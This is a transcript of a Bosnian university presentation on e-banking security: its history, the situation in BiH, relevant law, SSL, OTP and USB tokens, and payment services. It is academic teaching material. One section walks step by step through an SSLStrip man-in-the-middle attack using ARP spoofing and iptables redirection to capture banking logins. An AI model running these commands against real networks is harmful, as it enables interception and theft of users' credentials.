e-banking i sigurnost tehnickih rjesenja za internet transakcije -presentation
TRANSCRIPT
E-banking i sigurnost
tehničkih rješenja za Internet
transakcije
Univerzitet u Sarajevu Elektrotehnički fakultet
Mentor: dr. Narcis Behlilović Kandidat: Aldina Bajraktarević
KRATKI HISTORIJAT IDEJE e-BANKINGa
PROBLEMI KORISNIKA USLUGA e-BANKING
AKTUENI TRENDOVI
PREGLED STANJA e-BANKARSTVA U BIH
PRAVNA LEGISLATIVA RELEVANTNA ZA OBLAST BANKARSTVA I ELEKTRONSKOG BANKARSTVA
MEHANIZMI POSTIZANJA SIGURNOSTI ZA PRODAVCA I KUPCA U TRANSAKCIJI
SSL PROTOKOL
ANALIZA POTENCIJALNIH RJEŠENJA: OTP I USB TOKENI
MEHANIZMI ZA NARUŠAVANJE SIGURNOSTI
PRIMJERI USPJEŠNIH NAPADA
RIZICI KORIŠTENJA BANKOVNIH KARTICA ZA PLAĆANJE
PAYPAL
MONEYBOOKERS
PIKPAY
MJERE PREVENCIJE ZA ZAŠTITU SIGURNOSTI UČESNIKA U TRANSAKCIJI
E-banking ili elektronsko bankarstvo je opći pojam za procese kojima korisnik može obavljati bankarske transakcije elektronskim putem bez posjećivanja institucije nadležne za transakciju (banke, bankomati, ...).
KUPAC PRODAVAC
BANKA BANKA
Naručuje robu i
usluge
Šalje fakturu
Obavještava
prodavca da je
uplata izvršena
Daje nalog banci
da prebaci novac
prodavcu
Informiše
kupca da je
njegov račun
zadužen
Prebacuje sredstva na račun
prodavca
Informiše o izvršenoj uplati
Financijska i vremenska dobit
kvalitet
• Pronalazak novca (između 4. i 8. stoljeća p.n.e)
• Prvi elektronski transfer novca izvršen je još davne 1860. godine. -Western Union iz
SAD-a uz pomoć telegrafa
Prve ideje za rješavanje problema porasta obima papirnih tokova platnog prometa kroz proces kompjuterizacije i eliminisanje papira, ponudila su dva američka profesora, Jakobs Henri (Jacobs Henry) i Robert H. Gregory (Robert H. Gregory).
Osnovni nedostaci e-Bankinga su:
• odsustvu sigurnosti pri obavljanju poslovanja;
• nepostojanju zakonske regulative;
• nedostatak privatnosti, otuđenosti i odbojnosti prema inovacijama i opasnosti od zloupotrebe
internet bankarstva.
Usluge koje klijenti mogu dobiti on-line su:
• pribavljanje informacija o tekućem računu,
stanje na računu, dozvoljeni limit;
• printanje izvještaja o prometu na računu;
• transfer sa računa na račun;
• plaćanje računa;
• kupovina i prodaja akcija;
• naručivanje isplata;
• praćenje transfera novca;
• pregled aktuelnih kamata;
• kontakt sa bankom,...
Korištenje interneta u BiH u stalnom je porastu. Prema procjenama nadležnih agencija, više od 2.000.000 ljudi u ovoj zemlji koristi globalnu kompjutersku mrežu, što je oko 52 posto od ukupnog broja stanovnika.
70.474
96.041
Prema podacima CB BiH, upotreba e-bankinga za građane BiH:
2011 2012
23.865
29.599
Pravna lica
2011 2012
2006. godine BiH postaje članica Konvencije o cyber kriminalu Vijeća Evrope. Ovo je do sada najveći, najopsežniji ali i najkvalitetniji evropski dokument o takvoj vrsti kriminala koji su potpisale i neke neevropske zemlje.
Zakon o elektronskom potpisu 2006.
Ne postoji PKI infrastruktura za pravna i fizička lica na nivou države
Implementacija???
MUP RS-a formirao posebnu jedinicu za borbu protiv cyber kriminala, što je prvo odjeljenje te vrste u cijeloj BiH
U nadležnim institucijama trebalo bi razviti organizacije i educirati ljude kako bismo bili spremni da se borimo protiv ovog oblika kriminala. Do tada će postojeći zakoni za ovu oblast ostati samo na papiru.
• Smart Cards; • Tokeni; • Tanovi.
S I
G
U
R
N
O
S
T
SSL je autentifikacijski protokol, neovisan od aplikacije, i pruža sljedeće usluge: • Klijent-poslužitelj provjeru autentičnosti; • Tajnost podataka; • Provjera podataka izvora; • Integritet podataka.
Jednokratne lozinke su oblik „jake autentifikacije“, koja pruža veću razinu zaštite i koriste se za bankovne transakcije preko Interneta, mrežnim sistemima u firmama i drugim sistemima koji sadrže osjetljive i povjerljive informacije.
Naprednije vrste tokena zahtijevaju neki oblik veze sa računarom (npr. USB ili Bluetooth) kako bi stupili u kontakt sa poslužiteljem.
HTTPS: Hyper Text Transfer Protocol Secure - HTTPS je kombinacija Hyper Text Transfer
Protocol i Secure Socket Layer (SSL protokol) / Transport Layer Security (TLS) koji služi za
osiguranje šifrirane komunikaciju između web poslužitelja i klijenta. Obično se koristi HTTPS za
internet bankarstvo, platne transakcije stranicu za prijavu, itd. ovaj protokol na portu 443 za
komunikacije. Web stranice koje koriste ovaj HTTPS-u su i GMail.com, ali i druge web stranice
kao što su PayPal, Amazon, itd.
Ukoliko želimo da vidimo vezu računara i web poslužitelja u CommandPrompt ukucamo: netstat –an :
1.Linux OS
2. Arpspoof
3. IPTables
4. SSLStrip
5. NetStat
1. echo '1' > /proc/sys/net/ipv4/ip_forward
// Ovom naredbom omogućavamo port forwarding, dopušta se BackTrack-u da može
proslijediti svaki paket, pa i onaj koji nije namjenjen klijentovom računaru.
2. Saznati adresu mrežnog gatewaya
netstat –nr
3. Koristiti naredbu arpspoof, kako biste izvršili tkz. Man in the middle attack.
arpspoof -i eth0 77.78.248.141
4. SSLStrip kreiran od strane Moxie Morlinspike koji omogućava demonstraciju
HTTPS raskrivanje napada koji su izneseni na Black Hat DC 2009.
To će transparentno oteti HTTP promet na mreži, gledati https veze i preusmjeravanja,
a zatim mapirati veze u dvojne HTTP veze ili homografski slične HTTPS veze.
4.1 Download-ovati SSLStrip
4.2 tar zxvf sslstrip-0.9.tar.gz
4.3 cd sslstrip-0.9
4.4 python setup.py install
5. Izvršenje SSL Strip napada
5.1 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080
// Potrebno je podesiti firewall
pravilo preko naredbe iptables,
na način da se omogući
preusmjerenje upita sa porta
80 na 8080.
5.1.1 python sslstrip.py –w secret
echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 77.78.248.141 77.78.248.1
Unutar foldera SSLStrip kreiran je novi fajl koji pohranjuje sve informacije koje su već
snimljene preko HTTP protokola, pa čak i HTTPS. Iz priloženog je izvršeno oslobađanje
HTTPS-a od „s“-dodatka, pa tako sada se može izvršiti pristup stranici PayPal-a na
sljedeći način:
Phishing Pharming Blackhole kit
Carding- ako ne pokrijete karticu prilikom placanja,čitanje 16-cifrenog broja sa kartice sasvim dovoljan
Lažiranje poruka e-pošte i web stranica->cilj saznati povjerljive i korisne informacije
Preusmjeravanje korisnika na lažni web site
JavaScript kod
PAYPAL
MONEYBOOKERS
PIKPAY
Posrednik u kupovini između kupca i prodavca
E-servis koji omogućava platne usluge i transfer novca putem Interneta
Internet servis koji pruža On-line plaćanje, on-line naplata, podizanje novca u lokalnim bankama
city deal ekupon
Najveći nivo sigurnosti, fizička sigurnost servera, ANTI-FRAUD timovi, verifikacija Verisign...
MOSTAR BEOGRAD
BANJA LUKA SARAJEVO
corporateretail
CA
Kako bi administrator određenoj pametnoj kartici dodao certifikat, potrebno je da ručno pristupi CA, i da naravno preko mašine kojoj pristupa CA, bude priključen čitač kartica. Nakon što administartor ubaci karticu, koristi tkz. ActivCard Gold. To je programski paket, koji upotrebom kartice i čitača kartice ili USB ActivKey-a osigurava najviši nivo sigurnosti autentifikacije korisnika.
Analizirajući sistem koristi dužinu ključa od 1024 i hash algoritam SHA-1. Kada administrator doda digitalni certifikat, onda se automatski podaci prenose preko serijskog broja u aplikaciju.
VeriSign je poznata kompanija kojoj banka plaća usluge korištenja cetifikata. Da bi banka koristila usluge VeriSigna na tri godine, to košta cca 2.500,00 EURa.
serviseri
servisi
posrednici
uređaji za plaćanje
korisnikov računar
korisnikova svijest
Rezultati on-line ankete urađene na bazi 55 ispitanika
• U skorije vrijeme će sve veći broj firmi i građana uvidjeti da je mnogo jednostavnije obavljati internet transakcije
iz svog doma, po mnogo nižoj cijeni i na jednostavan način. S druge strane, kombinacija backtrack, sslstrip i MiTM
je samo jedno od potencijalno jakih sredstava za narušavanje sigurnosti bankovnih računa na vrlo „jednostavan“ način.
Ono što se ostavlja kao otvoreno pitanje
bankama i ostalim pružaocima usluga
internet bankarstva, jeste pitanje spoja
usluge, cijene, sigurnosti i same reklame u
jednu jedinstvenu cijelinu, koja bi izazvala
povjerenje kod korisnika usluga, a ujedno
donijela određene profite.
KUPAC
PRODAVAC
BANKA